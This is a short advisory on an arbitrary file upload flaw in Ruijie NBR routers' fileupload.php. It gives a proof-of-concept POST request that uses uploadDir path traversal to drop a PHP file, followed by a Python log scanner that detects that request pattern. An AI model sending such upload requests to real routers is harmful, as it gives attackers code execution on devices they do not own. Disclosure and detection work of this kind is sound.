Ruijie NBR router fileupload.php arbitrary file upload vulnerability
Vulnerability Description
The fileupload.php file on Ruijie NBR routers contains an arbitrary file upload vulnerability. An attacker can upload any file to the server and thereby obtain server permissions.
Vulnerability Impact
Ruijie NBR router
Network surveying and mapping
Vulnerability Reproduction
The vulnerable file is /ddi/server/fileupload.php, a standard file upload handler.
The file name and the target directory are both controllable by the requester, so files can be uploaded at will.
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
<?php phpinfo();?>
Access the uploaded file directory
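A defender-side check for the request pattern above, as an added example that is not part of the original post: it scans web access log lines for POSTs to /ddi/server/fileupload.php whose uploadDir or name values match the abuse described. The log format, the extension list and the helper names (fully_decode, inspect_line, scan) are assumptions, and the sample log lines are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names come from the request shown on this page.
UPLOAD_PATH = "/ddi/server/fileupload.php"
# Assumption: extensions the device's web server would execute.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Assumption: common/combined log format with the request line in quotes.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .) and unify separators."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def inspect_line(line):
    """Return the reasons a log line looks like abuse of the upload endpoint."""
    m = REQUEST_LINE.search(line)
    if not m or m.group("method") != "POST":
        return []
    url = urlsplit(m.group("target"))
    path = posixpath.normpath(re.sub(r"/+", "/", fully_decode(url.path)))
    if path.lower() != UPLOAD_PATH:
        return []
    params = {k.lower(): fully_decode(v) for k, v in parse_qsl(url.query, keep_blank_values=True)}
    reasons = []
    upload_dir = params.get("uploaddir", "")
    if ".." in upload_dir.split("/") or upload_dir.startswith("/"):
        reasons.append("uploadDir leaves the upload directory")
    name = params.get("name", "")
    if "/" in name or SCRIPT_EXT.search(name.rstrip(". ")):
        reasons.append("name is a path or has a script extension")
    return reasons

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: r for n, l in enumerate(lines, 1) if (r := inspect_line(l))}

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1" 200 12',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "POST /ddi/server/fileupload.php?uploadDir=%252e%252e%252fx&name=a.jpg HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "POST /ddi/server/fileupload.php?uploadDir=upload&name=report.txt HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /index.htm HTTP/1.1" 200 512',
]
```

Calling scan(SAMPLE_LOG) flags the first two lines only; the second shows why values are decoded repeatedly before the traversal check.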
This post is licensed under CC BY 4.0 by the author.